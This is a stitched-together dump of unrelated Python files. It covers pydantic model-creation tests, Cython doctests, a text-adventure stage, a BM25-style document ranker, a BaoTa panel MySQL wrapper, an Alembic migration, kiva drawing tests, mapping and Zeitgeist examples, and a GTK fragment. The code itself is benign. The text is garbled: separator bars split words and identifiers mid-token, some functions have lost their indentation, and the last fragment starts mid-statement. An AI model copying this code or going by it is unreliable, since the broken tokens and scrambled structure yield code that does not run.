    """
    @create_module
    def module():
        import pickle
        from pydantic import create_model
        FooModel = create_model('FooModel', foo=(str, ...), bar=123, __module__=__name__)
        m = FooModel(foo='hello')
        d = pickle.dumps(m)
        m2 = pickle.loads(d)
        assert m2.foo == m.foo == 'hello'
        assert m2.bar == m.bar == 123
        assert m2 == m
        assert m2 is not m
def test_invalid_name():
    # Underscore-prefixed kwargs are ignored (with a warning), not made fields.
    with pytest.warns(RuntimeWarning):
        model = create_model('FooModel', _foo=(str, ...))
    assert len(model.__fields__) == 0
def test_field_wrong_tuple():
    # A field tuple must be (type, default); three elements is a config error.
    with pytest.raises(errors.ConfigError):
        create_model('FooModel', foo=(1, 2, 3))
def test_config_and_base():
    # __config__ and __base__ are mutually exclusive arguments.
    with pytest.raises(errors.ConfigError):
        create_model('FooModel', __config__=BaseModel.Config, __base__=BaseModel)
def test_inheritance():
    class BarModel(BaseModel):
        x = 1
        y = 2
    # Fields from __base__ are merged with the dynamically declared ones.
    model = create_model('FooModel', foo=(str, ...), bar=(int, 123), __base__=BarModel)
    assert model.__fields__.keys() == {'foo', 'bar', 'x', 'y'}
    m = model(foo='a', x=4)
    assert m.dict() == {'bar': 123, 'foo': 'a', 'x': 4, 'y': 2}
def test_custom_config():
    # A plain (non-inheriting) Config class is honoured and still ends up
    # as a subclass of BaseModel.Config.
    class Config:
        fields = {'foo': 'api-foo-field'}
    model = create_model('FooModel', foo=(int, ...), __config__=Config)
    assert model(**{'api-foo-field': '987'}).foo == 987
    assert issubclass(model.__config__, BaseModel.Config)
    with pytest.raises(ValidationError):
        model(foo=654)
def test_custom_config_inherits():
    # Same behaviour when Config explicitly inherits BaseModel.Config.
    class Config(BaseModel.Config):
        fields = {'foo': 'api-foo-field'}
    model = create_model('FooModel', foo=(int, ...), __config__=Config)
    assert model(**{'api-foo-field': '987'}).foo == 987
    assert issubclass(model.__config__, BaseModel.Config)
    with pytest.raises(ValidationError):
        model(foo=654)
def test_custom_config_extras():
    # extra=forbid from the custom config rejects unknown fields.
    class Config(BaseModel.Config):
        extra = Extra.forbid
    model = create_model('FooModel', foo=(int, ...), __config__=Config)
    assert model(foo=654)
    with pytest.raises(ValidationError):
        model(bar=654)
def test_inheritance_validators():
    class BarModel(BaseModel):
        @validator('a', check_fields=False)
        def check_a(cls, v):
            if 'foobar' not in v:
                raise ValueError('"foobar" not found in a')
            return v
    # Validators declared on __base__ apply to dynamically added fields;
    # the default value is NOT validated without always=True.
    model = create_model('FooModel', a='cake', __base__=BarModel)
    assert model().a == 'cake'
    assert model(a='this is foobar good').a == 'this is foobar good'
    with pytest.raises(ValidationError):
        model(a='something else')
def test_inheritance_validators_always():
    class BarModel(BaseModel):
        @validator('a', check_fields=False, always=True)
        def check_a(cls, v):
            if 'foobar' not in v:
                raise ValueError('"foobar" not found in a')
            return v
    # With always=True even the default value 'cake' is validated (and fails).
    model = create_model('FooModel', a='cake', __base__=BarModel)
    with pytest.raises(ValidationError):
        model()
    assert model(a='this is foobar good').a == 'this is foobar good'
    with pytest.raises(ValidationError):
        model(a='something else')
def test_inheritance_validators_all():
    class BarModel(BaseModel):
        @validator('*')
        def check_all(cls, v):
            return v * 2
    # A '*' validator from the base applies to every dynamic field.
    model = create_model('FooModel', a=(int, ...), b=(int, ...), __base__=BarModel)
    assert model(a=2, b=6).dict() == {'a': 4, 'b': 12}
def test_funky_name():
    # Field names that are not Python identifiers work via **kwargs/.dict().
    model = create_model('FooModel', **{'this-is-funky': (int, ...)})
    m = model(**{'this-is-funky': '123'})
    assert m.dict() == {'this-is-funky': 123}
    with pytest.raises(ValidationError) as exc_info:
        model()
    assert exc_info.value.errors() == [
        {'loc': ('this-is-funky',), 'msg': 'field required', 'type': 'value_error.missing'}
    ]
def test_repeat_base_usage():
    # Reusing a base across several create_model calls must not leak fields
    # back into the base class or between sibling models.
    class Model(BaseModel):
        a: str
    assert Model.__fields__.keys() == {'a'}
    model = create_model('FooModel', b=1, __base__=Model)
    assert Model.__fields__.keys() == {'a'}
    assert model.__fields__.keys() == {'a', 'b'}
    model2 = create_model('Foo2Model', c=1, __base__=Model)
    assert Model.__fields__.keys() == {'a'}
    assert model.__fields__.keys() == {'a', 'b'}
    assert model2.__fields__.keys() == {'a', 'c'}
    model3 = create_model('Foo2Model', d=1, __base__=model)
    assert Model.__fields__.keys() == {'a'}
    assert model.__fields__.keys() == {'a', 'b'}
    assert model2.__fields__.keys() == {'a', 'c'}
    assert model3.__fields__.keys() == {'a', 'b', 'd'}
def test_dynamic_and_static():
    class A(BaseModel):
        x: int
        y: float
        z: str
    # A dynamic model should expose the same field defaults as the
    # equivalent statically declared one.
    DynamicA = create_model('A', x=(int, ...), y=(float, ...), z=(str, ...))
    for field_name in ('x', 'y', 'z'):
        assert A.__fields__[field_name].default == DynamicA.__fields__[field_name].default
def test_config_field_info_create_model():
    class Config:
        fields = {'a': {'description': 'descr'}}
    # Config-level field info is honoured both with and without Field().
    m1 = create_model('M1', __config__=Config, a=(str, ...))
    assert m1.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
    m2 = create_model('M2', __config__=Config, a=(str, Field(...)))
    assert m2.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
|
import cython
def test_sizeof():
    """
    >>> test_sizeof()
    True
    True
    True
    True
    True
    """
    # In interpreted (pure-Python) mode cython.sizeof returns emulated
    # sizes, so the last check is split on cython.compiled.
    x = cython.declare(cython.bint)
    print(cython.sizeof(x) == cython.sizeof(cython.bint))
    print(cython.sizeof(cython.char) <= cython.sizeof(cython.short) <= cython.sizeof(cython.int) <= cython.sizeof(cython.long) <= cython.sizeof(cython.longlong))
    print(cython.sizeof(cython.uint) == cython.sizeof(cython.int))
    print(cython.sizeof(cython.p_int) == cython.sizeof(cython.p_double))
    if cython.compiled:
        print(cython.sizeof(cython.char) < cython.sizeof(cython.longlong))
    else:
        print(cython.sizeof(cython.char) == 1)
## CURRENTLY BROKEN - FIXME!!
## def test_declare(n):
## """
## >>> test_dec | lare(100)
## (100, 100)
## >>> test_declare(100.5)
## (100, 100)
## >>> test_declare(None)
## Traceback (most recent call last):
## ...
## TypeError: an integer is required
## """
## x = cython.declare(cython.int)
## y = cython.declare(cython.int, n)
## if cython.compiled:
## cython.declare(xx=cython.int, yy=cython.long)
## i = sizeof(xx)
## ptr = cython.declare(cython.p_int, cython.address(y))
## return y, ptr[0]
@cython.locals(x=cython. | double, n=cython.int)
def test_cast(x):
"""
>>> test_cast(1.5)
1
"""
n = cython.cast(cython.int, x)
return n
@cython.locals(x=cython.int, y=cython.p_int)
def test_address(x):
    """
    >>> test_address(39)
    39
    """
    # Take a pointer to x and read the value back through it.
    y = cython.address(x)
    return y[0]
## CURRENTLY BROKEN - FIXME!!
## @cython.locals(x=cython.int)
## @cython.locals(y=cython.bint)
## def test_locals(x):
## """
## >>> test_locals(5)
## True
## """
## y = x
## return y
def test_with_nogil(nogil):
    """
    >>> raised = []
    >>> class nogil(object):
    ...     def __enter__(self):
    ...         pass
    ...     def __exit__(self, exc_class, exc, tb):
    ...         raised.append(exc)
    ...         return exc_class is None
    >>> test_with_nogil(nogil())
    WORKS
    True
    >>> raised
    [None]
    """
    # The parameter deliberately shadows cython.nogil for the outer 'with';
    # the inner 'with cython.nogil' exercises the real (or emulated) form.
    result = False
    with nogil:
        print("WORKS")
        with cython.nogil:
            result = True
    return result
## CURRENTLY BROKEN - FIXME!!
## MyUnion = cython.union(n=cython.int, x=cython.double)
## MyStruct = cython.struct(is_integral=cython.bint, data=MyUnion)
## MyStruct2 = cython.typedef(MyStruct[2])
## def test_struct(n, x):
## """
## >>> test_struct(389, 1.64493)
## (389, 1.64493)
## """
## a = cython.declare(MyStruct2)
## a[0] = MyStruct(True, data=MyUnion(n=n))
## a[1] = MyStruct(is_integral=False, data={'x': x})
## return a[0].data.n, a[1].data.x
import cython as cy
from cython import declare, cast, locals, address, typedef, p_void, compiled
from cython import declare as my_declare, locals as my_locals, p_void as my_void_star, typedef as my_typedef, compiled as my_compiled
@my_locals(a=cython.p_void)
def test_imports():
    """
    >>> test_imports() # (True, True)
    True
    """
    # Exercises the plain, aliased, and module-qualified import forms of
    # declare/p_void; all three should behave identically.
    a = cython.NULL
    b = declare(p_void, cython.NULL)
    c = my_declare(my_void_star, cython.NULL)
    d = cy.declare(cy.p_void, cython.NULL)
    ## CURRENTLY BROKEN - FIXME!!
    #return a == d, compiled == my_compiled
    return compiled == my_compiled
## CURRENTLY BROKEN - FIXME!!
## MyStruct3 = typedef(MyStruct[3])
## MyStruct4 = my_typedef(MyStruct[4])
## MyStruct5 = cy.typedef(MyStruct[5])
def test_declare_c_types(n):
    """
    >>> test_declare_c_types(0)
    >>> test_declare_c_types(1)
    >>> test_declare_c_types(2)
    """
    # Booleans
    b00 = cython.declare(cython.bint, 0)
    b01 = cython.declare(cython.bint, 1)
    b02 = cython.declare(cython.bint, 2)
    # Integer types across widths and signedness
    i00 = cython.declare(cython.uchar, n)
    i01 = cython.declare(cython.char, n)
    i02 = cython.declare(cython.schar, n)
    i03 = cython.declare(cython.ushort, n)
    i04 = cython.declare(cython.short, n)
    i05 = cython.declare(cython.sshort, n)
    i06 = cython.declare(cython.uint, n)
    i07 = cython.declare(cython.int, n)
    i08 = cython.declare(cython.sint, n)
    i09 = cython.declare(cython.slong, n)
    i10 = cython.declare(cython.long, n)
    i11 = cython.declare(cython.ulong, n)
    i12 = cython.declare(cython.slonglong, n)
    i13 = cython.declare(cython.longlong, n)
    i14 = cython.declare(cython.ulonglong, n)
    i20 = cython.declare(cython.Py_ssize_t, n)
    i21 = cython.declare(cython.size_t, n)
    # Floating-point types
    f00 = cython.declare(cython.float, n)
    f01 = cython.declare(cython.double, n)
    f02 = cython.declare(cython.longdouble, n)
    # Complex types (currently disabled)
    #z00 = cython.declare(cython.complex, n+1j)
    #z01 = cython.declare(cython.floatcomplex, n+1j)
    #z02 = cython.declare(cython.doublecomplex, n+1j)
    #z03 = cython.declare(cython.longdoublecomplex, n+1j)
|
"""cairo_museum.py"""
from lib.stage import Stage
class CairoMuseum(Stage):
    """Cairo Museum stage"""
    # NOTE: the action strings are typed to the console verbatim, so their
    # layout (leading newline, unindented body) is intentional.
    def desc(self):
        """Describe action: narration shown when the player arrives."""
        action = """
After getting the first replicant, you call some old friends and some of them
mentions something about a hippie woman that likes no jokes. You get the next
ship to Cairo and go to a big museum. Everything smells dust and there are a
lot of camels and people around. In an isolated corner, you see a different
woman in bad mood, looking to you from time to time...
        """
        self.console.simulate_typing(action)
    def look(self):
        """Look action"""
        action = """
Everyone seens to be busy looking at the art, mainly the big statues, nothing
suspicious, except for a different woman in the corner...
        """
        self.console.simulate_typing(action)
    def talk(self):
        """Talk action"""
        action = """
You say 'hi' to the woman...
        """
        self.console.simulate_typing(action)
    def joke(self):
        """Joke action"""
        action = """
You tell a really good joke and an old mummy start laughing...
        """
        self.console.simulate_typing(action)
    def fight(self):
        """Fight action"""
        action = """
You try to start a fight, but a camel holds you and tells you to calm down...
        """
        self.console.simulate_typing(action)
|
# -*- coding: utf-8 -*-
# A search engine based on probabilitistic models of the information retrival.
# Author - Janu Verma
# email - jv367@cornell.edu
# http://januverma.wordpress.com/
# @januverma
import sys
from pydoc import help
import os
from collections import defaultdict
from math import log, sqrt
import operator
class ProbModel:
    """
    Implements probabilitistic models for information retrieval.

    Documents are scored against a query with a BM25-style odds ratio:
    each query term contributes an inverse-document-frequency weight,
    scaled by term-frequency saturation (tuning parameter k) and
    document-length normalization (tuning parameter b).
    """
    def __init__(self, directory):
        """
        Arguments:
            directory - Directory of documents to be searched.
        """
        self.corpus = os.listdir(directory)
        # Map of full file path -> raw document text.
        self.text = {}
        for f in self.corpus:
            f = os.path.join(directory, f)
            with open(f) as doc:
                self.text[f] = doc.read()
    def words(self, document):
        """
        All the words in a document.
        Arguments:
            document : A textual document.
        Returns:
            The lower-cased whitespace tokens of length >= 2 that are not
            pure digit strings.
        """
        # (fixed: the original read `len(x) >= 2and`, a typo that is a
        # syntax error on modern Python tokenizers)
        tokens = [x.lower() for x in document.split()]
        return [x for x in tokens if len(x) >= 2 and not x.isdigit()]
    def word_freq(self, wordlist):
        """
        Build a dictionary of words with the frequencies of their occurrence.
        Arguments:
            wordlist : A list of all the words in a document.
        Returns:
            A dict-like mapping of word -> occurrence count.
        """
        wordFreq = defaultdict(int)
        for w in wordlist:
            wordFreq[w] += 1
        return wordFreq
    def vocabalury(self):
        """
        All the words in the corpus (with repetitions).
        Note: the method name's spelling is kept for backward compatibility.
        Returns:
            A list of all the words in the corpus.
        """
        allWords = []
        for doc in self.text.values():
            allWords.extend(self.words(doc))
        return allWords
    def doc_freq(self):
        """
        Compute the document frequency of all the terms in the corpus.
        Returns:
            A dict-like mapping of term -> number of documents containing it.
        """
        # Tokenize each document once; the original re-tokenized every
        # document for every vocabulary word (O(V*D) tokenizations).
        docFreq = defaultdict(int)
        for doc in self.text.values():
            for term in set(self.words(doc)):
                docFreq[term] += 1
        return docFreq
    def docScore(self, document, query, k, b):
        """
        Compute the log odds ratio of the document being relevant to the query.
        Arguments:
            document : A textual document.
            query : The search query.
            k : tuning parameter for term frequency.
            b : tuning parameter for document length.
        Returns:
            A float score. Query terms absent from this document or from the
            whole corpus contribute 0 (the original code raised
            ZeroDivisionError in both cases; its try/except around the
            defaultdict lookups could never fire).
        """
        # total number of docs
        n = len(self.corpus)
        # tokens of this document and its length
        docText = self.words(document)
        l = len(docText)
        # average document length over the corpus
        l_av = float(len(self.vocabalury())) / n
        # document-frequency and term-frequency tables
        df = self.doc_freq()
        tf = self.word_freq(docText)
        score = 0
        for x in self.words(query):
            tf_x = tf.get(x, 0)
            df_x = df.get(x, 0)
            # Missing term: tf == 0 contributes nothing, df == 0 would make
            # the idf (and the original code) divide by zero. Skip both.
            if tf_x == 0 or df_x == 0:
                continue
            # inverse document frequency of the term
            idf = log(n / df_x)
            # term-frequency saturation with document-length normalization
            correction = float((k + 1) * tf_x) / (k * (1 - b) + b * (l / l_av) + tf_x)
            score += idf * correction
        return score
    def ranking(self, query, k, b):
        """
        Ranking of the documents based on their relevance to the query.
        Arguments:
            query: The search query.
            k, b : tuning parameters; None is treated as 0.
        Returns:
            A dict-like mapping of document name -> relevance odds ratio.
        """
        if k is None:
            k = 0
        if b is None:
            b = 0
        rankingDict = defaultdict(float)
        for name, docText in self.text.items():
            rankingDict[name] = self.docScore(docText, query, k, b)
        return rankingDict
    def search(self, query, n_docs, k=None, b=None):
        """
        Returns documents which are most relevant to the query.
        Ranking is done by decreasing odds ratio for the document to be
        relevant for the query.
        Arguments:
            String query : Search query
            Integer n_docs : Number of matching documents retrieved (capped
                at the corpus size).
            Float k : tuning parameter for term frequency, (0<=k<=1).
                A value of 0 corresponds to a binary model (no term
                frequency); a large value corresponds to raw term frequency.
            Float b : tuning parameter for document length, (0<=b<=1).
                b = 1 fully scales the term weight by document length,
                b = 0 applies no length normalization.
        Returns:
            A list of up to n_docs document names, most relevant first.
        """
        if n_docs > len(self.corpus):
            n_docs = len(self.corpus)
        # .items() works on both Python 2 and 3 (the original used the
        # Python-2-only .iteritems()).
        rankings = sorted(self.ranking(query, k, b).items(),
                          key=operator.itemgetter(1), reverse=True)
        return [name for name, score in rankings[:n_docs]]
|
#coding: utf-8
# +-------------------------------------------------------------------
# | | 宝塔Linux面板 |
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 宝塔软件(http://bt.cn) All rights reserved.
# +-------------------------------------------------------------------
# | Author: 黄文良 <2879625666@qq.com>
# +-------------------------------------------------------------------
import re,os
class panelMysql:
    """Thin wrapper around MySQLdb for the panel.

    Connects as root using the password stored in the panel config,
    reading the port from /etc/my.cnf and caching which host name
    ('127.0.0.1' vs 'localhost') last connected successfully.
    Python 2 only (uses `except Exception, e` syntax).
    """
    __DB_PASS = None
    __DB_USER = 'root'
    __DB_PORT = 3306
    __DB_HOST = '127.0.0.1'
    __DB_CONN = None
    __DB_CUR = None
    __DB_ERR = None
    # Cache file recording the host name that last connected successfully.
    __DB_HOST_CONF = 'data/mysqlHost.pl';
    # Connect to the MySQL database
    def __Conn(self):
        try:
            import public
            try:
                import MySQLdb
            except Exception,ex:
                self.__DB_ERR = ex
                return False;
            try:
                # Read the listening port from /etc/my.cnf, default 3306.
                myconf = public.readFile('/etc/my.cnf');
                rep = "port\s*=\s*([0-9]+)"
                self.__DB_PORT = int(re.search(rep,myconf).groups()[0]);
            except:
                self.__DB_PORT = 3306;
            self.__DB_PASS = public.M('config').where('id=?',(1,)).getField('mysql_root');
            try:
                if os.path.exists(self.__DB_HOST_CONF): self.__DB_HOST = public.readFile(self.__DB_HOST_CONF);
                self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
            except MySQLdb.Error,e:
                # Error 2003 = can't reach server: retry once with the
                # alternate host name and remember the one that worked.
                if e[0] != 2003:
                    self.__DB_ERR = e
                    return False
                if self.__DB_HOST == 'localhost':
                    self.__DB_HOST = '127.0.0.1';
                else:
                    self.__DB_HOST = 'localhost';
                public.writeFile(self.__DB_HOST_CONF,self.__DB_HOST);
                self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
            self.__DB_CUR = self.__DB_CONN.cursor()
            return True
        except MySQLdb.Error,e:
            self.__DB_ERR = e
            return False
    def execute(self,sql):
        # Execute an SQL statement and return the number of affected rows
        if not self.__Conn(): return self.__DB_ERR
        try:
            result = self.__DB_CUR.execute(sql)
            self.__DB_CONN.commit()
            self.__Close()
            return result
        except Exception,ex:
            return ex
    def query(self,sql):
        # Execute an SQL statement and return the result set
        if not self.__Conn(): return self.__DB_ERR
        try:
            self.__DB_CUR.execute(sql)
            result = self.__DB_CUR.fetchall()
            # Convert the tuples to lists
            data = map(list,result)
            self.__Close()
            return data
        except Exception,ex:
            return ex
    # Close the connection
    def __Close(self):
        self.__DB_CUR.close()
        self.__DB_CONN.close()
def at_len(the_list):
    """
    Takes a list and returns the number
    of atomic elements (basic unit of data)
    of the list, descending into nested lists.
    :param the_list: a (possibly nested) list of elements
    :return: the number of atomic (non-list) elements at any depth
    """
    # Recurse into sub-lists; every non-list element counts as one.
    return sum(
        at_len(item) if isinstance(item, list) else 1
        for item in the_list
    )
|
import random
class Dice(object):
    '''
    Source of randomness simulating two six-sided dice.
    This class exists as a seam for testing: a deterministic
    stand-in can be substituted for it in tests.
    '''
    def roll(self):
        '''
        Returns two value: the rolls of the two dice.
        '''
        # Roll each die independently, in order, as a 2-tuple.
        return tuple(random.randint(1, 6) for _ in range(2))
|
#!/usr/bin/env python
# Demo script: store the integers 0..99 in 'mydata.hdf5'.
from hdf5handler import HDF5Handler
handler = HDF5Handler('mydata.hdf5')
handler.open()
# Append each value under the 'numbers' dataset.
for i in range(100):
    handler.put(i, 'numbers')
# Flush buffered data and close the file.
handler.close()
|
"""simplify transa | ction log
Revision ID: 8c2406df6f8
Revises: 58732bb5d14b
Create Date: 2014-08-08 01:57:17.144405
"""
# revision identifiers, used by Alembic.
revision = '8c2406df6f8'
down_revision = '58732bb5d14b'
from alembic import op
from sqlalchemy.sql import text
def upgrade():
    # Collapse the old two-snapshot layout into one 'snapshot' column,
    # rename table_name -> object_type, drop the unused private_snapshot
    # and delta columns, and index object_public_id for lookups.
    conn = op.get_bind()
    conn.execute(text('''
        ALTER TABLE transaction
            CHANGE public_snapshot snapshot LONGTEXT,
            CHANGE table_name object_type VARCHAR(20),
            DROP COLUMN private_snapshot,
            DROP COLUMN delta,
            ADD INDEX `ix_transaction_object_public_id` (`object_public_id`)
        '''))
def downgrade():
    # Irreversible: the dropped columns' data cannot be reconstructed.
    raise Exception()
|
impor | t contextlib
import os
import shutil
imp | ort tempfile
import numpy
from PIL import Image
from kiva.fonttools import Font
from kiva.constants import MODERN
class DrawingTester(object):
    """ Basic drawing tests for graphics contexts.

    Subclasses supply the concrete backend via create_graphics_context()
    and the result check via draw_and_check().
    """
    def setUp(self):
        # Each test renders into a fresh 300x300 context with a red
        # stroke/fill and a 5-pixel pen, saving under a temp directory.
        self.directory = tempfile.mkdtemp()
        self.filename = os.path.join(self.directory, 'rendered')
        self.gc = self.create_graphics_context(300, 300)
        self.gc.clear()
        self.gc.set_stroke_color((1.0, 0.0, 0.0))
        self.gc.set_fill_color((1.0, 0.0, 0.0))
        self.gc.set_line_width(5)
    def tearDown(self):
        # Release the context before removing its output directory.
        del self.gc
        shutil.rmtree(self.directory)
    def test_line(self):
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.move_to(107, 204)
            self.gc.line_to(107, 104)
            self.gc.stroke_path()
    def test_rectangle(self):
        # Rectangle traced manually from four line segments.
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.move_to(107, 104)
            self.gc.line_to(107, 184)
            self.gc.line_to(187, 184)
            self.gc.line_to(187, 104)
            self.gc.line_to(107, 104)
            self.gc.stroke_path()
    def test_rect(self):
        # Rectangle via the dedicated rect() primitive.
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.rect(0, 0, 200, 200)
            self.gc.stroke_path()
    def test_circle(self):
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
            self.gc.stroke_path()
    def test_quarter_circle(self):
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.arc(150, 150, 100, 0.0, numpy.pi / 2)
            self.gc.stroke_path()
    def test_text(self):
        with self.draw_and_check():
            font = Font(family=MODERN)
            font.size = 24
            self.gc.set_font(font)
            self.gc.set_text_position(23, 67)
            self.gc.show_text("hello kiva")
    def test_circle_fill(self):
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
            self.gc.fill_path()
    def test_star_fill(self):
        # Self-intersecting star: exercises the nonzero winding fill rule.
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.move_to(100, 100)
            self.gc.line_to(150, 200)
            self.gc.line_to(200, 100)
            self.gc.line_to(100, 150)
            self.gc.line_to(200, 150)
            self.gc.line_to(100, 100)
            self.gc.fill_path()
    def test_star_eof_fill(self):
        # Same star, filled with the even-odd rule instead.
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.move_to(100, 100)
            self.gc.line_to(150, 200)
            self.gc.line_to(200, 100)
            self.gc.line_to(100, 150)
            self.gc.line_to(200, 150)
            self.gc.line_to(100, 100)
            self.gc.eof_fill_path()
    def test_circle_clip(self):
        with self.draw_and_check():
            self.gc.clip_to_rect(150, 150, 100, 100)
            self.gc.begin_path()
            self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
            self.gc.fill_path()
    def test_text_clip(self):
        with self.draw_and_check():
            self.gc.clip_to_rect(23, 77, 100, 23)
            font = Font(family=MODERN)
            font.size = 24
            self.gc.set_font(font)
            self.gc.set_text_position(23, 67)
            self.gc.show_text("hello kiva")
    def test_star_clip(self):
        # Use the star outline itself as the clip region for a filled circle.
        with self.draw_and_check():
            self.gc.begin_path()
            self.gc.move_to(100, 100)
            self.gc.line_to(150, 200)
            self.gc.line_to(200, 100)
            self.gc.line_to(100, 150)
            self.gc.line_to(200, 150)
            self.gc.line_to(100, 100)
            self.gc.close_path()
            self.gc.clip()
            self.gc.begin_path()
            self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
            self.gc.fill_path()
    #### Required methods ####################################################
    @contextlib.contextmanager
    def draw_and_check(self):
        """ A context manager to check the result.
        """
        raise NotImplementedError()
    def create_graphics_context(self, width, length):
        """ Create the desired graphics context
        """
        raise NotImplementedError()
class DrawingImageTester(DrawingTester):
    """ Basic drawing tests for graphics contexts of gui toolkits.
    """
    @contextlib.contextmanager
    def draw_and_check(self):
        """ Let the test draw, then save the context to a PNG and verify
        that something was actually rendered.
        """
        yield
        filename = "{0}.png".format(self.filename)
        self.gc.save(filename)
        self.assertImageSavedWithContent(filename)
    def assertImageSavedWithContent(self, filename):
        """ Load the image and check that there is some content in it.

        Content is detected as at least one pure-red pixel (the stroke/fill
        colour configured in setUp).
        """
        image = numpy.array(Image.open(filename))
        # default is expected to be a totally white image
        self.assertEqual(image.shape[:2], (300, 300))
        if image.ndim < 3:
            # A greyscale image cannot contain the red test colour; fail
            # cleanly instead of raising IndexError on shape[2] below.
            self.fail(
                'Image has no colour channels, shape is {0}'.format(
                    image.shape))
        if image.shape[2] == 3:
            check = numpy.sum(image == [255, 0, 0], axis=2) == 3
        elif image.shape[2] == 4:
            check = numpy.sum(image == [255, 0, 0, 255], axis=2) == 4
        else:
            self.fail(
                'Pixel size is not 3 or 4, but {0}'.format(image.shape[2]))
        if check.any():
            return
        self.fail('The image looks empty, no red pixels were drawn')
|
from mpl_toolkits.basemap import Basemap, shiftgrid, maskoceans, interp
import numpy as np
import matplotlib.pyplot as plt
# example showing how to mask out 'wet' areas on a contour or pcolor plot.
topodatin = np.loadtxt('etopo20data.gz')
lonsin = np.loadtxt('etopo20lons.gz')
latsin = np.loadtxt('etopo20lats.gz')
# shift data so lons go from -180 to 180 instead of 20 to 380.
topoin,lons1 = shiftgrid(180.,topodatin,lonsin,start=False)
lats1 = latsin
fig=plt.figure()
# setup basemap
m=Basemap(resolution='l',projection='lcc',lon_0=-100,lat_0=40,width=8.e6,height=6.e6)
lons, lats = np.meshgrid(lons1,lats1)
x, y = m(lons, lats)
# interpolate land/sea mask to topo grid, mask ocean values.
# output may look 'blocky' near coastlines, since data is at much
# lower resolution than land/sea mask.
topo = maskoceans(lons, lats, topoin)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (original grid)')
fig=plt.figure()
# | interpolate topo data to higher resolution grid (to better match
# the land/sea mask). Output looks less 'blocky' near coastlines.
nlats = 3*topoin.shape[0]
nlons = 3*topoin.shape[1]
lons = np.linspace(-180,180,nlons)
lats = np.linspace(-90,90,nlats)
lons, lats = np.meshgrid(lons, lats)
x, y = m(lons, lats)
topo = interp(topoin,lons1,lats1,lons,lat | s,order=1)
# interpolate land/sea mask to topo grid, mask ocean values.
topo = maskoceans(lons, lats, topo)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (data on finer grid)')
plt.show()
|
# Python 2 example: query Zeitgeist for the 20 most recent audio events
# and print their ids and subject URIs.
from gi.repository import Zeitgeist, GLib
log = Zeitgeist.Log.get_default()
mainloop = GLib.MainLoop()
def on_events_received(log, result, data):
    # Async callback: finish the find_events call, print each event's id
    # and subject URIs, then stop the main loop.
    events = log.find_events_finish(result)
    for i in xrange(events.size()):
        event = events.next_value()
        if event:
            print "Event id:", event.get_property("id")
            for i in xrange(event.num_subjects()):
                subj = event.get_subject(i)
                print " -", subj.get_property("uri")
    mainloop.quit()
# Template event: matches any event whose subject is audio content.
subject = Zeitgeist.Subject.full("", Zeitgeist.AUDIO, "", "", "", "", "")
event = Zeitgeist.Event()
event.add_subject(subject)
time_range = Zeitgeist.TimeRange.anytime ();
log.find_events(time_range,
    [event],
    Zeitgeist.StorageState.ANY,
    20,
    Zeitgeist.ResultType.MOST_RECENT_SUBJECTS,
    None,
    on_events_received,
    None)
mainloop.run()
|
cted": -1,
"pair":self.correspondencesList[index]['indexPair'], "colour": None} ) )
frameVBoxOptions.add(self.vBoxOptions)
frameVBoxCorrespondences.add(self.vBoxCorrespondences)
hBoxExercises.pack_start(frameVBoxOptions, True,True,5)
hBoxExercises.pack_start(frameVBoxCorrespondences, True,True,50)
vBoxWindows.pack_start(frameExercises, True,True,0)
windowSimpleAssociation.add_with_viewport(vBoxWindows)
if stateJson is not None:
self.repaintResumeItems()
else:
self.setAllAvailableSelectionColour()
self.selectFirtImage(firstOptionEventBox)
return windowSimpleAssociation
    def repaintResumeItems(self):
        """Restore highlight colours of options/correspondences from saved state.

        Used when resuming from a saved exercise (stateJson); walks the two
        widget columns in parallel and re-applies each recorded colour.
        """
        for index, value in enumerate(self.optionsSelectionState):
            # Each column child is a framing EventBox wrapping the real one.
            eventBoxOption = self.vBoxOptions.get_children()[index].get_children()[0]
            eventBoxCorrespondence = self.vBoxCorrespondences.get_children()[index].get_children()[0]
            if value['colour'] is not None:
                self.mainWindows.getLogger().debug(value)
                self.changeBackgroundColour(eventBoxOption,str(value['colour']['colour']))
                valueCorresondence = self.correspondencesSelectionState[index]
                self.mainWindows.getLogger().debug(valueCorresondence)
                if valueCorresondence['colour'] is not None:
                    self.changeBackgroundColour(eventBoxCorrespondence, str(valueCorresondence['colour']['colour']))
        # Re-apply the visual selection to the currently selected option frame.
        firstFrameOption = self.vBoxOptions.get_children()[self.currentOptionSelected]
        self.fakeSelection(firstFrameOption)
def addEventBoxToVBox(self, eventBox, vBox):
frameEventBox = gtk.EventBox()
frameEventBox.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color("white"))
eventBox.set_border_width(5)
frameEventBox.add(eventBox)
vBox.pack_start(frameEventBox, False,False,0)
def createEventBox(self, payload, typePayload):
eventBox = gtk.EventBox()
eventBox.set_size_request(EVENTBOX_SCALE[0], EVENTBOX_SCALE[1])
if typePayload == "image":
